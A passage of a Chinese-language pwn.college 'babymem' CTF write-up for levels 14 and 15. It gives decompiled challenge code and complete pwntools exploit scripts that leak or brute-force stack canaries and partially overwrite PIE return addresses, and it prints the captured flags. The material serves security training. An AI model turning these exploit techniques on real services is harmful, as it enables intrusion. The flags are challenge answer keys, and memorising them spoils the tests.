v9 = a1; v8 = a2; v7 = a3; v14 = __readfsqword(0x28u); buf = &v13; nbytes = 0LL; puts("The challenge() function has just been launched!"); puts("However... An important initialization step was missed."); puts("Use this to your advantage!"); puts(byte_3284); sp_ = (__int64)&v6; bp_ = (__int64)&savedregs; sz_ = ((unsigned __int64)((char *)&savedregs - (char *)&v6) >> 3) + 2; rp_ = (__int64)&retaddr; puts("Before we do anything, let's take a look at challenge()'s stack frame:"); DUMP_STACK(sp_, sz_); printf("Our stack pointer points to %p, and our base pointer points to %p.\n", (const void *)sp_, (const void *)bp_); printf("This means that we have (decimal) %d 8-byte words in our stack frame,\n", sz_); puts("including the saved base pointer and the saved return address, for a"); printf("total of %d bytes.\n", 8 * sz_); printf("The input buffer begins at %p, partway through the stack frame,\n", buf); puts("(\"above\" it in the stack are other local variables used by the function)."); puts("Your input will be read into this buffer."); printf("The buffer is %d bytes long, but the program will let you provide an arbitrarily\n", 407); puts("large input length, and thus overflow the buffer.\n"); puts("In this level, there is no \"win\" variable."); puts("You will need to force the program to execute the win_authed() function"); puts("by directly overflowing into the stored return address back to main,"); printf( "which is stored at %p, %d bytes after the start of your input buffer.\n", (const void *)rp_, rp_ - (_DWORD)buf); printf( "That means that you will need to input at least %d bytes (%d to fill the buffer,\n", rp_ - (_DWORD)buf + 8, 407); printf("%d to fill other stuff stored between the buffer and the return address,\n", rp_ - (_DWORD)buf - 407); puts("and 8 that will overwrite the return address).\n"); cp_ = bp_; cv_ = __readfsqword(0x28u); while ( *(_QWORD *)cp_ != cv_ ) cp_ -= 8LL; puts("Because the binary is position independent, you cannot know"); puts("exactly where the win_authed() function is located."); puts("This means that it is not clear what should be written into the return address.\n"); printf("Payload size: "); __isoc99_scanf("%lu", &nbytes); printf("You have chosen to send %lu bytes of input!\n", nbytes); printf("This will allow you to write from %p (the start of the input buffer)\n", buf); printf( "right up to (but not including) %p (which is %d bytes beyond the end of the buffer).\n", (char *)buf + nbytes, nbytes - 407); printf("Of these, you will overwrite %d bytes into the return address.\n", nbytes + (_DWORD)buf - rp_); puts("If that number is greater than 8, you will overwrite the entire return address.\n"); puts("Overwriting the entire return address is fine when we know"); puts("the whole address, but here, we only really know the last three nibbles."); puts("These nibbles never change, because pages are aligned to 0x1000."); puts("This gives us a workaround: we can overwrite the least significant byte"); puts("of the saved return address, which we can know from debugging the binary,"); puts("to retarget the return to main to any instruction that shares the other 7 bytes."); puts("Since that last byte will be constant between executions (due to page alignment),"); puts("this will always work."); puts("If the address we want to redirect execution to is a bit farther away from"); puts("the saved return address, and we need to write two bytes, then one of those"); puts("nibbles (the fourth least-significant one) will be a guess, and it will be"); puts("incorrect 15 of 16 times."); puts("This is okay: we can just run our exploit a few times until it works"); puts("(statistically, ~50% chance after 11 times and ~90% chance after 36 times)."); puts("One caveat in this challenge is that the win_authed() function must first auth:"); puts("it only lets you win if you provide it with the argument 0x1337."); puts("Speifically, the win_authed() function looks something like:"); puts(" void win_authed(int token)"); puts(" {"); puts(" if (token != 0x1337) return;"); puts(" puts(\"You win! Here is your flag: \");"); puts(" sendfile(1, open(\"/flag\", 0), 0, 256);"); puts(" puts(\"\");"); puts(" }"); puts(byte_3284); puts("So how do you pass the check? There *is* a way, and we will cover it later,"); puts("but for now, we will simply bypass it! You can overwrite the return address"); puts("with *any* value (as long as it points to executable code), not just the start"); puts("of functions. Let's overwrite past the token check in win!\n"); puts("To do this, we will need to analyze the program with objdump, identify where"); puts("the check is in the win_authed() function, find the address right after the check,"); puts("and write that address over the saved return address.\n"); puts("Go ahead and find this address now. When you're ready, input a buffer overflow"); printf( "that will overwrite the saved return address (at %p, %d bytes into the buffer)\n", (const void *)rp_, rp_ - (_DWORD)buf); puts("with the correct value.\n"); printf("Send your payload (up to %lu bytes)!\n", nbytes); v10 = read(0, buf, nbytes); if ( v10 < 0 ) { v3 = __errno_location();24 collapsed lines
v4 = strerror(*v3); printf("ERROR: Failed to read input -- %s!\n", v4); exit(1); } printf("You sent %d bytes!\n", v10); puts("Let's see what happened with the stack:\n"); DUMP_STACK(sp_, sz_); puts("The program's memory status:"); printf("- the input buffer starts at %p\n", buf); printf("- the saved frame pointer (of main) is at %p\n", (const void *)bp_); printf("- the saved return address (previously to main) is at %p\n", (const void *)rp_); printf("- the saved return address is now pointing to %p.\n", *(const void **)rp_); printf("- the canary is stored at %p.\n", (const void *)cp_); printf("- the canary value is now %p.\n", *(const void **)cp_); printf("- the address of win_authed() is %p.\n", win_authed); putchar(10); puts("If you have managed to overwrite the return address with the correct value,"); puts("challenge() will jump straight to win_authed() when it returns."); printf("Let's try it now!\n\n"); if ( (unsigned __int64)buf + v10 > rp_ + 2 ) { puts("WARNING: You sent in too much data, and overwrote more than two bytes of the address."); puts(" This can still work, because I told you the correct address to use for"); puts(" this execution, but you should not rely on that information."); puts(" You can solve this challenge by only overwriting two bytes!"); puts(" "); } printf("You said: %.407s\n", (const char *)buf); puts("This challenge has a trick hidden in its code. Reverse-engineer the binary right after this puts()"); puts("call to see the hidden backdoor!"); if ( strstr((const char *)buf, "REPEAT") ) { puts("Backdoor triggered! Repeating challenge()"); return challenge(v9, v8, v7); } else { puts("Goodbye!");3 collapsed lines
return 0LL; }}
这题就是前面几个 level 的结合体。唯一的不同之处在于,这次 canary 和其它一些数据以残留数据的形式出现在 challenge
创建的栈帧内部,我们只要把这个残留的 canary 泄漏出来就好了。至于 challenge
本身的 canary,我们泄漏不了。所以其实出题人的本意就是想让我们泄漏栈上的残留数据,为此对泄漏 challenge
原本的 canary 的途径做了限制。
至于我是如何发现残留数据这一事实的,是通过动态调试,凭借对 canary 敏锐的洞察力发现的 LMAO。咱就是说对数据的敏感度也很重要哦~
为了避免这种残留数据/栈帧复用的问题,我们每次分配完栈空间后都应该通过类似 memset
的方法清空栈内容才对。所以,如果没有 memset
from pwn import ELF, context, gdb, log, pause, process, random, remote
context(log_level="debug", terminal="kitty")
FILE = "./babymem-level-14-0"HOST, PORT = "pwn.college", 1337
gdbscript = """c"""
def to_hex_bytes(data): return "".join(f"\\x{byte:02x}" for byte in data)
def launch(local=True, debug=False, aslr=False, argv=None, envp=None): if local: elf = ELF(FILE) context.binary = elf
if debug: return gdb.debug( [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp ) else: return process([elf.path] + (argv or []), env=envp) else: return remote(HOST, PORT)
backdoor = b"REPEAT "backdoor_trigger = b"".ljust(0x82, b"A") + backdoorpadding_to_canary = b"".ljust(0x198, b"A")padding_to_ret = b"".ljust(0x8, b"A")fixed_offset = b"\xd4"possible_bytes = [bytes([i]) for i in range(0xF, 0x10F, 0x10)]
def send_payload(target, payload): try: payload_size = f"{len(payload)}".encode()
target.sendlineafter(b"Payload size: ", payload_size) target.sendafter(b"Send your payload", payload) except Exception as e: log.exception(f"An error occurred while sending payload: {e}")
def leak_canary(target): try: send_payload(target, backdoor_trigger) target.recvuntil(backdoor)
canary = b"\x00" + target.recv(0x7) log.success(f"Canary: {to_hex_bytes(canary)}")
return canary except Exception as e: log.exception(f"An error occurred while leaking canary: {e}")
def construct_payload(target): canary = leak_canary(target)
payload = padding_to_canary payload += canary payload += padding_to_ret payload += fixed_offset + random.choice(possible_bytes)
return payload
def attack(target, payload): try: send_payload(target, payload)
response = target.recvall()
return b"You win!" in response except Exception as e: log.exception(f"An error occurred while performing leak_flag: {e}")
def main(): while True: target = launch(debug=False)
try: payload = construct_payload(target)
if attack(target, payload): log.success("Success! Exiting...")
pause() exit() else: target.close() target = launch() except Exception as e: log.exception(f"An error occurred in main loop: {e}")
if __name__ == "__main__": main()
Flag: pwn.college{chm7VMiV6dZ3oBKDhVUhtvXg3kb.0VNxMDL5cTNxgzW}
Level 14.1
- Category: Pwn
Leak data left behind unintentionally to defeat a stack canary in a PIE binary.
from pwn import ELF, context, gdb, log, pause, process, random, remote
context(log_level="debug", terminal="kitty")
FILE = "./babymem-level-14-1"HOST, PORT = "pwn.college", 1337
gdbscript = """b *challenge+168c"""
def to_hex_bytes(data): return "".join(f"\\x{byte:02x}" for byte in data)
def launch(local=True, debug=False, aslr=False, argv=None, envp=None): if local: elf = ELF(FILE) context.binary = elf
if debug: return gdb.debug( [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp ) else: return process([elf.path] + (argv or []), env=envp) else: return remote(HOST, PORT)
backdoor = b"REPEAT "backdoor_trigger = b"".ljust(0x72, b"A") + backdoorpadding_to_canary = b"".ljust(0x188, b"A")padding_to_ret = b"".ljust(0x8, b"A")fixed_offset = b"\x7d"possible_bytes = [bytes([i]) for i in range(0x8, 0x108, 0x10)]
def send_payload(target, payload): try: payload_size = f"{len(payload)}".encode()
target.sendlineafter(b"Payload size: ", payload_size) target.sendafter(b"Send your payload", payload) except Exception as e: log.exception(f"An error occurred while sending payload: {e}")
def leak_canary(target): try: send_payload(target, backdoor_trigger) target.recvuntil(backdoor)
canary = b"\x00" + target.recv(0x7) log.success(f"Canary: {to_hex_bytes(canary)}")
return canary except Exception as e: log.exception(f"An error occurred while leaking canary: {e}")
def construct_payload(target): canary = leak_canary(target)
payload = padding_to_canary payload += canary payload += padding_to_ret payload += fixed_offset + random.choice(possible_bytes)
return payload
def attack(target, payload): try: send_payload(target, payload)
response = target.recvall()
return b"You win!" in response except Exception as e: log.exception(f"An error occurred while performing leak_flag: {e}")
def main(): while True: target = launch(debug=False)
try: payload = construct_payload(target)
if attack(target, payload): log.success("Success! Exiting...")
pause() exit() else: target.close() target = launch() except Exception as e: log.exception(f"An error occurred in main loop: {e}")
if __name__ == "__main__": main()
Flag: pwn.college{E_7686TOh__Z7NZeXfOPaMP5YfJ.0lNxMDL5cTNxgzW}
Level 15.0
- Category: Pwn
Defeat a stack canary in a PIE binary by utilizing a network-style fork server in the target binary.
int __fastcall main(int argc, const char **argv, const char **envp){ int optval; // [rsp+24h] [rbp-101Ch] BYREF int fd; // [rsp+28h] [rbp-1018h] int v7; // [rsp+2Ch] [rbp-1014h] sockaddr addr; // [rsp+30h] [rbp-1010h] BYREF unsigned __int64 v9; // [rsp+1038h] [rbp-8h]
v9 = __readfsqword(0x28u); setvbuf(stdin, 0LL, 2, 0LL); setvbuf(stdout, 0LL, 2, 0LL); puts("###"); printf("### Welcome to %s!\n", *argv); puts("###"); putchar(10); puts("This challenge is listening for connections on TCP port 1337.\n"); puts("The challenge supports unlimited sequential connections.\n"); fd = socket(2, 1, 0); optval = 1; setsockopt(fd, 1, 2, &optval, 4u); addr.sa_family = 2; *(_DWORD *)&addr.sa_data[2] = 0; *(_WORD *)addr.sa_data = htons(0x539u); bind(fd, &addr, 0x10u); listen(fd, 1); while ( 1 ) { v7 = accept(fd, 0LL, 0LL); if ( !fork() ) break; close(v7); wait(0LL); } dup2(v7, 0); dup2(v7, 1); dup2(v7, 2); close(fd); close(v7); challenge((unsigned int)argc, argv, envp); puts("### Goodbye!"); return 0;}
观察这个 main
函数我们可知,它所做的大致就是持续监听 1337
端口,连上了就创建一个子进程执行 challenge
126 collapsed lines
__int64 __fastcall challenge(int a1, __int64 a2, __int64 a3){ int *v3; // rax char *v4; // rax _QWORD v6[3]; // [rsp+0h] [rbp-C0h] BYREF int v7; // [rsp+1Ch] [rbp-A4h] int v8; // [rsp+2Ch] [rbp-94h] size_t nbytes; // [rsp+30h] [rbp-90h] BYREF void *buf; // [rsp+38h] [rbp-88h] _QWORD v11[13]; // [rsp+40h] [rbp-80h] BYREF __int16 v12; // [rsp+A8h] [rbp-18h] unsigned __int64 v13; // [rsp+B8h] [rbp-8h] __int64 savedregs; // [rsp+C0h] [rbp+0h] BYREF _UNKNOWN *retaddr; // [rsp+C8h] [rbp+8h] BYREF
v7 = a1; v6[2] = a2; v6[1] = a3; v13 = __readfsqword(0x28u); memset(v11, 0, sizeof(v11)); v12 = 0; buf = v11; nbytes = 0LL; puts("The challenge() function has just been launched!"); sp_ = (__int64)v6; bp_ = (__int64)&savedregs; sz_ = ((unsigned __int64)((char *)&savedregs - (char *)v6) >> 3) + 2; rp_ = (__int64)&retaddr; puts("Before we do anything, let's take a look at challenge()'s stack frame:"); DUMP_STACK(sp_, sz_); printf("Our stack pointer points to %p, and our base pointer points to %p.\n", (const void *)sp_, (const void *)bp_); printf("This means that we have (decimal) %d 8-byte words in our stack frame,\n", sz_); puts("including the saved base pointer and the saved return address, for a"); printf("total of %d bytes.\n", 8 * sz_); printf("The input buffer begins at %p, partway through the stack frame,\n", buf); puts("(\"above\" it in the stack are other local variables used by the function)."); puts("Your input will be read into this buffer."); printf("The buffer is %d bytes long, but the program will let you provide an arbitrarily\n", 106); puts("large input length, and thus overflow the buffer.\n"); puts("In this level, there is no \"win\" variable."); puts("You will need to force the program to execute the win_authed() function"); puts("by directly overflowing into the stored return address back to main,"); printf( "which is stored at %p, %d bytes after the start of your input buffer.\n", (const void *)rp_, rp_ - (_DWORD)buf); printf( "That means that you will need to input at least %d bytes (%d to fill the buffer,\n", rp_ - (_DWORD)buf + 8, 106); printf("%d to fill other stuff stored between the buffer and the return address,\n", rp_ - (_DWORD)buf - 106); puts("and 8 that will overwrite the return address).\n"); cp_ = bp_; cv_ = __readfsqword(0x28u); while ( *(_QWORD *)cp_ != cv_ ) cp_ -= 8LL; puts("While canaries are enabled, this networked program forks."); puts("What is important to note is that the canary does not get re-randomized on fork.\n"); puts("When data that you are overflowing into is critical (i.e., if you screw it up"); puts("the program crashes), but also static across executions, you can brute-force"); puts("it byte by byte over many attempts.\n"); puts("So, let's brute-force the canary!"); puts("If this is your first time running this program, all you know so far is that"); puts("the canary has a 0 as its left-most byte."); puts("You should proceed like this:\n"); puts("- First, you should try overflowing just the null byte of the canary, for"); printf(" practice. The canary starts at %p, which is %d bytes after the\n", (const void *)cp_, cp_ - (_DWORD)buf); printf(" start of your buffer. Thus, you should provide %d characters followed\n", cp_ - (_DWORD)buf); puts(" by a NULL byte, make sure the canary check passes, then try a non-NULL"); puts(" byte and make sure the canary check fails. This will confirm the offsets."); puts("- Next try each possible value for just the next byte. One of them (the same"); puts(" as whatever was there in memory already) will keep the canary intact, and"); puts(" when the canary check succeeds, you know you have found the correct one."); puts("- Go on to the next byte, leak it the same way, and so on, until you have"); puts(" the whole canary.\n"); puts("You will likely want to script this process! Each byte might take up to 256"); puts("tries to guess..\n"); puts("Because the binary is position independent, you cannot know"); puts("exactly where the win_authed() function is located."); puts("This means that it is not clear what should be written into the return address.\n"); printf("Payload size: "); __isoc99_scanf("%lu", &nbytes); printf("You have chosen to send %lu bytes of input!\n", nbytes); printf("This will allow you to write from %p (the start of the input buffer)\n", buf); printf( "right up to (but not including) %p (which is %d bytes beyond the end of the buffer).\n", (char *)buf + nbytes, nbytes - 106); printf("Of these, you will overwrite %d bytes into the return address.\n", nbytes + (_DWORD)buf - rp_); puts("If that number is greater than 8, you will overwrite the entire return address.\n"); puts("Overwriting the entire return address is fine when we know"); puts("the whole address, but here, we only really know the last three nibbles."); puts("These nibbles never change, because pages are aligned to 0x1000."); puts("This gives us a workaround: we can overwrite the least significant byte"); puts("of the saved return address, which we can know from debugging the binary,"); puts("to retarget the return to main to any instruction that shares the other 7 bytes."); puts("Since that last byte will be constant between executions (due to page alignment),"); puts("this will always work."); puts("If the address we want to redirect execution to is a bit farther away from"); puts("the saved return address, and we need to write two bytes, then one of those"); puts("nibbles (the fourth least-significant one) will be a guess, and it will be"); puts("incorrect 15 of 16 times."); puts("This is okay: we can just run our exploit a few times until it works"); puts("(statistically, ~50% chance after 11 times and ~90% chance after 36 times)."); puts("One caveat in this challenge is that the win_authed() function must first auth:"); puts("it only lets you win if you provide it with the argument 0x1337."); puts("Speifically, the win_authed() function looks something like:"); puts(" void win_authed(int token)"); puts(" {"); puts(" if (token != 0x1337) return;"); puts(" puts(\"You win! Here is your flag: \");"); puts(" sendfile(1, open(\"/flag\", 0), 0, 256);"); puts(" puts(\"\");"); puts(" }"); puts(byte_43BB); puts("So how do you pass the check? There *is* a way, and we will cover it later,"); puts("but for now, we will simply bypass it! You can overwrite the return address"); puts("with *any* value (as long as it points to executable code), not just the start"); puts("of functions. Let's overwrite past the token check in win!\n"); puts("To do this, we will need to analyze the program with objdump, identify where"); puts("the check is in the win_authed() function, find the address right after the check,"); puts("and write that address over the saved return address.\n"); puts("Go ahead and find this address now. When you're ready, input a buffer overflow"); printf( "that will overwrite the saved return address (at %p, %d bytes into the buffer)\n", (const void *)rp_, rp_ - (_DWORD)buf); puts("with the correct value.\n"); printf("Send your payload (up to %lu bytes)!\n", nbytes); v8 = read(0, buf, nbytes); if ( v8 < 0 ) { v3 = __errno_location();30 collapsed lines
v4 = strerror(*v3); printf("ERROR: Failed to read input -- %s!\n", v4); exit(1); } printf("You sent %d bytes!\n", v8); puts("Let's see what happened with the stack:\n"); DUMP_STACK(sp_, sz_); puts("The program's memory status:"); printf("- the input buffer starts at %p\n", buf); printf("- the saved frame pointer (of main) is at %p\n", (const void *)bp_); printf("- the saved return address (previously to main) is at %p\n", (const void *)rp_); printf("- the saved return address is now pointing to %p.\n", *(const void **)rp_); printf("- the canary is stored at %p.\n", (const void *)cp_); printf("- the canary value is now %p.\n", *(const void **)cp_); printf("- the address of win_authed() is %p.\n", win_authed); putchar(10); puts("If you have managed to overwrite the return address with the correct value,"); puts("challenge() will jump straight to win_authed() when it returns."); printf("Let's try it now!\n\n"); if ( (unsigned __int64)buf + v8 > rp_ + 2 ) { puts("WARNING: You sent in too much data, and overwrote more than two bytes of the address."); puts(" This can still work, because I told you the correct address to use for"); puts(" this execution, but you should not rely on that information."); puts(" You can solve this challenge by only overwriting two bytes!"); puts(" "); } puts("Goodbye!"); return 0LL;}
这个 challenge
因为我们的子进程都是由主进程生成的,所以每个子进程都会持有和主进程相同的 canary 值。利用这点加上栈溢出漏洞,我们可以爆破 canary。这是个 64-bits 程序,我们实际只要爆破 56-bits,所以爆破时间不会很长。
把 canary 爆出来后,就可以去快乐的覆盖返回地址了。因为有 PIE 保护,所以我们还得猜倒数第四个 nibble,不过我相信这对你来说也是一件很轻松的事情~
import osimport subprocessimport time
import psutilfrom pwn import ELF, context, gdb, log, pause, process, random, remote, sleep
context(log_level="debug", terminal="kitty")
FILE = "./babymem-level-15-0"HOST, PORT = "localhost", 1337
gdbscript = """set follow-fork-mode childb *challenge+1807c"""
def to_hex_bytes(data): return "".join(f"\\x{byte:02x}" for byte in data)
def get_forked_pid(parent_pid): parent = psutil.Process(parent_pid) children = parent.children()
log.success(f"Parent process: {parent_pid} -> Found children: {children}") if len(children) != 1: raise Exception(f"Expected 1 child process, found {len(children)}") return children[0].pid
def launch(local=True, debug=False, aslr=False, argv=None, envp=None, attach=False): if local: elf = ELF(FILE) context.binary = elf
target = process([elf.path] + (argv or []), env=envp, aslr=aslr)
if debug: if attach: with open(os.devnull, "w") as fnull: subprocess.Popen( [context.terminal[0], "-e", "nc", "localhost", "1337"], stderr=fnull, ) sleep(3)
child_pid = get_forked_pid(target.pid) gdb.attach(target=child_pid, gdbscript=gdbscript)
return remote(HOST, PORT) else: target.close()
return gdb.debug( [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp ) else: return process([elf.path] + (argv or []), env=envp) else: return remote(HOST, PORT)
padding_to_canary = b"".ljust(0x78, b"A")padding_to_ret = b"".ljust(0x8, b"A")fixed_offset = b"\x6b"possible_bytes = [bytes([i]) for i in range(0xD, 0x10D, 0x10)]
def send_payload(target, payload): try: payload_size = f"{len(payload)}".encode()
target.sendlineafter(b"Payload size: ", payload_size) target.sendafter(b"Send your payload", payload) except Exception as e: log.exception(f"An error occurred while sending payload: {e}")
def brute_force_canary(): canary = b"\x00" start_time = time.time()
log.progress("Brute-forcing the canary...")
while len(canary) < 0x8: for byte in range(0x0, 0xFF): with remote(HOST, PORT) as target: send_payload(target, padding_to_canary + canary + bytes([byte]))
response = target.recvall(timeout=5)
if b"*** stack smashing detected ***" not in response: canary += bytes([byte]) break
end_time = time.time() elapsed_time = end_time - start_time
log.success( f"Canary brute-forced: {to_hex_bytes(canary)} in {elapsed_time:.2f} seconds" ) sleep(1)
return canary
def construct_payload(canary): payload = padding_to_canary payload += canary payload += padding_to_ret payload += fixed_offset + random.choice(possible_bytes)
return payload
def attack(payload): try: with remote(HOST, PORT) as target: send_payload(target, payload)
response = target.recvall(timeout=5)
return b"pwn.college{" in response except Exception as e: log.exception(f"An error occurred while performing attack: {e}")
def main(): launch() canary = brute_force_canary()
while True: try: payload = construct_payload(canary)
if attack(payload): log.success("Success! Exiting...")
pause() exit() except Exception as e: log.exception(f"An error occurred in main loop: {e}")
if __name__ == "__main__": main()
Flag: pwn.college{MiU_dCA8jccj_TYZgFn1iejPdTj.01NxMDL5cTNxgzW}
Level 15.1
- Category: Pwn
Defeat a stack canary in a PIE binary by utilizing a network-style fork server in the target binary.
import osimport subprocessimport time
import psutilfrom pwn import ELF, context, gdb, log, pause, process, random, remote, sleep
context(log_level="debug", terminal="kitty")
FILE = "./babymem-level-15-1"HOST, PORT = "localhost", 1337
gdbscript = """set follow-fork-mode childb *challenge+213c"""
def to_hex_bytes(data): return "".join(f"\\x{byte:02x}" for byte in data)
def get_forked_pid(parent_pid): parent = psutil.Process(parent_pid) children = parent.children()
log.success(f"Parent process: {parent_pid} -> Found children: {children}") if len(children) != 1: raise Exception(f"Expected 1 child process, found {len(children)}") return children[0].pid
def launch(local=True, debug=False, aslr=False, argv=None, envp=None, attach=False): if local: elf = ELF(FILE) context.binary = elf
target = process([elf.path] + (argv or []), env=envp, aslr=aslr)
if debug: if attach: with open(os.devnull, "w") as fnull: subprocess.Popen( [context.terminal[0], "-e", "nc", "localhost", "1337"], stderr=fnull, ) sleep(3)
child_pid = get_forked_pid(target.pid) gdb.attach(target=child_pid, gdbscript=gdbscript)
return remote(HOST, PORT) else: target.close()
return gdb.debug( [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp ) else: return process([elf.path] + (argv or []), env=envp) else: return remote(HOST, PORT)
padding_to_canary = b"".ljust(0x48, b"A")padding_to_ret = b"".ljust(0x8, b"A")fixed_offset = b"\xcd"possible_bytes = [bytes([i]) for i in range(0x5, 0x105, 0x10)]
def send_payload(target, payload): try: payload_size = f"{len(payload)}".encode()
target.sendlineafter(b"Payload size: ", payload_size) target.sendafter(b"Send your payload", payload) except Exception as e: log.exception(f"An error occurred while sending payload: {e}")
def brute_force_canary(): canary = b"\x00" start_time = time.time()
while len(canary) < 0x8: for byte in range(0x0, 0xFF): with remote(HOST, PORT) as target: log.progress("Brute-forcing the canary...") send_payload(target, padding_to_canary + canary + bytes([byte]))
response = target.recvall(timeout=5)
if b"*** stack smashing detected ***" not in response: canary += bytes([byte]) break
end_time = time.time() elapsed_time = end_time - start_time
log.success( f"Canary brute-forced: {to_hex_bytes(canary)} in {elapsed_time:.2f} seconds" ) sleep(1)
return canary
def construct_payload(canary): payload = padding_to_canary payload += canary payload += padding_to_ret payload += fixed_offset + random.choice(possible_bytes)
return payload
def attack(payload): try: with remote(HOST, PORT) as target: send_payload(target, payload)
response = target.recvall(timeout=5)
return b"pwn.college{" in response except Exception as e: log.exception(f"An error occurred while performing attack: {e}")
def main(): launch() canary = brute_force_canary()
while True: try: payload = construct_payload(canary)
if attack(payload): log.success("Success! Exiting...")
pause() exit() except Exception as e: log.exception(f"An error occurred in main loop: {e}")
if __name__ == "__main__": main()
Flag: pwn.college{8C2ZHb8LE-O7bRe0DvQeo4_5XUV.0FOxMDL5cTNxgzW}
的题目质量没得说,我感觉很棒。打完这 30 题一共花了我 18 天,感觉挺慢的,但算了一下天数好像也没花太久吧哈哈哈。那么,下一站,Shellcode Injection!
马上就放寒假了,不知道我能在下次开学前达到什么水平呢 >w<
话说,如果你不写后记,你一定不知道写后记有多爽 bushi
Alr, right now, let’s sleep! Let’s liberate~